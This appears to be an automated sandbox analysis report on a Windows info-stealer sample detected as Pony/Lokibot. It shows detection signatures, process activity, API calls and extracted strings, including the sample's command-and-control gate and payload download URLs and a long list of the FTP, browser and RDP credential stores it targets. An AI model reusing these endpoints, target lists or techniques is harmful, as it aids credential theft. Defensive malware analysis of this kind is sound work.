Play interactive tour

Edit tour

Analysis Report eQDy6dGVwQ.exe

Overview

General Information

Sample Name:	eQDy6dGVwQ.exe
Analysis ID:	376014
MD5:	eb2fbc15dfb24af75c431b7525fed6e7
SHA1:	f060052cf7ee32a7aa2fa17f9f749880b70ffff3
SHA256:	5ee70bdf6cfa9c2742889a7c724fa6940e40c64d6ab420303ea6e031ae3d6ce4
Tags:	exePony
Infos:
Most interesting Screenshot:

Detection

Lokibot Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Lokibot Info Stealer

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Pony

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

eQDy6dGVwQ.exe (PID: 1316 cmdline: 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' MD5: EB2FBC15DFB24AF75C431B7525FED6E7)

cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
eQDy6dGVwQ.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
eQDy6dGVwQ.exe	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12f97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x151b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x127b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12dda:$s3: POST %s HTTP/1.0 0x12e03:$s4: Accept-Encoding: identity, ;q=0 0x12f10:$s4: Accept-Encoding: identity, ;q=0

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x31b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xdda:$s3: POST %s HTTP/1.0 0xe03:$s4: Accept-Encoding: identity, ;q=0 0xf10:$s4: Accept-Encoding: identity, ;q=0
00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x31b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xdda:$s3: POST %s HTTP/1.0 0xe03:$s4: Accept-Encoding: identity, ;q=0 0xf10:$s4: Accept-Encoding: identity, ;q=0
00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: eQDy6dGVwQ.exe PID: 1316	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: eQDy6dGVwQ.exe PID: 1316	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: eQDy6dGVwQ.exe PID: 1316	pony	Identify Pony	Brian Wallace @botnet_hunter	0x1cd3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x31b2:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x364e:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x443b:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x20b41:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x22379:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x25b14:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x2643d:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x5200f:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x53847:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x56fd8:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x57901:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1f83b:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1fd8d:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x50ce4:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x51236:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1767:$s3: POST %s HTTP/1.0 0x4a80:$s3: POST %s HTTP/1.0 0x20967:$s3: POST %s HTTP/1.0 0x221c5:$s3: POST %s HTTP/1.0 0x51e35:$s3: POST %s HTTP/1.0
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.eQDy6dGVwQ.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.eQDy6dGVwQ.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.eQDy6dGVwQ.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x13bda:$s3: POST %s HTTP/1.0 0x13c03:$s4: Accept-Encoding: identity, ;q=0 0x13d10:$s4: Accept-Encoding: identity, ;q=0
0.2.eQDy6dGVwQ.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x13bda:$s3: POST %s HTTP/1.0 0x13c03:$s4: Accept-Encoding: identity, ;q=0 0x13d10:$s4: Accept-Encoding: identity, ;q=0

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: eQDy6dGVwQ.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: eQDy6dGVwQ.exe	Virustotal: Detection: 84%	Perma Link
Source: eQDy6dGVwQ.exe	Metadefender: Detection: 89%	Perma Link
Source: eQDy6dGVwQ.exe	ReversingLabs: Detection: 96%

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

Machine Learning detection for sample

Show sources

Source: eQDy6dGVwQ.exe

Joe Sandbox ML: detected

Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack	Avira: Label: TR/PSW.Fareit.iloen
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack	Avira: Label: TR/PSW.Fareit.iloen

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	0_2_0040A712
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	0_2_0040D3BE
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,	0_2_0040BC36
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040A557 WideCharToMultiByte,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,CryptUnprotectData,LocalFree,73D5A680,	0_2_0040A557
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	0_2_0040A96D
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,	0_2_0040CE3D
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,	0_2_0040AB24
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004043DC CryptUnprotectData,LocalFree,	0_2_004043DC

Source: eQDy6dGVwQ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004051E3 FindFirstFileA,lstrcmpi,lstrcmpi,FindNextFileA,FindClose,	0_2_004051E3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004041A6 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_004041A6
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00404E73 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404E73
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00408AE5 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_00408AE5
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00409832
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00408961 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_00408961

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49725 -> 3.13.191.225:80
Source: Traffic	Snort IDS: 2014234 ET TROJAN Fareit/Pony Downloader Checkin 3 192.168.2.4:49725 -> 3.13.191.225:80

Source: Joe Sandbox View

IP Address: 3.13.191.225 3.13.191.225

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic

HTTP traffic detected: GET /dump.exe HTTP/1.0Host: 63e2e5290bcf.ngrok.ioAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: global traffic

HTTP traffic detected: GET /dump.exe HTTP/1.0Host: 63e2e5290bcf.ngrok.ioAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: eQDy6dGVwQ.exe, 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: eQDy6dGVwQ.exe	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 63e2e5290bcf.ngrok.io

Source: eQDy6dGVwQ.exe	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://63e2e5290bcf.ngrok.io/dump.exe
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://63e2e5290bcf.ngrok.io/gate.php
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: eQDy6dGVwQ.exe	String found in binary or memory: http://www.ibsensoftware.com/
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud:

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: eQDy6dGVwQ.exe, type: SAMPLE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004121E9		0_2_004121E9
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00402EFD		0_2_00402EFD

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: String function: 00410808 appears 42 times

Source: eQDy6dGVwQ.exe, 00000000.00000002.658546222.0000000002B20000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs eQDy6dGVwQ.exe
Source: eQDy6dGVwQ.exe, 00000000.00000002.658653658.0000000002C10000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs eQDy6dGVwQ.exe
Source: eQDy6dGVwQ.exe, 00000000.00000002.658653658.0000000002C10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs eQDy6dGVwQ.exe

Source: eQDy6dGVwQ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: eQDy6dGVwQ.exe, type: SAMPLE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@1/1

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

0_2_0040D3BE

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,

0_2_00402968

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

0_2_00402CE7

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

File created: C:\Users\user\AppData\Local\Temp\4066921.bat

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '

Source: eQDy6dGVwQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: eQDy6dGVwQ.exe	Virustotal: Detection: 84%
Source: eQDy6dGVwQ.exe	Metadefender: Detection: 89%
Source: eQDy6dGVwQ.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Users\user\Desktop\eQDy6dGVwQ.exe 'C:\Users\user\Desktop\eQDy6dGVwQ.exe'
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '	Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Data Obfuscation:

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: eQDy6dGVwQ.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY
Source: Yara match	File source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,

0_2_00410065

Hooking and other Techniques for Hiding and Protection:

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Show sources

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

File dump: 4066921.bat.0.dr 3880EEB1C736D853EB13B44898B718AB

Jump to dropped file

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004051E3 FindFirstFileA,lstrcmpi,lstrcmpi,FindNextFileA,FindClose,	0_2_004051E3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_004041A6 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_004041A6
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00404E73 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404E73
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00408AE5 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_00408AE5
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00409832
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	Code function: 0_2_00408961 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,	0_2_00408961

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe

Code function: 0_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_004045FD

Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
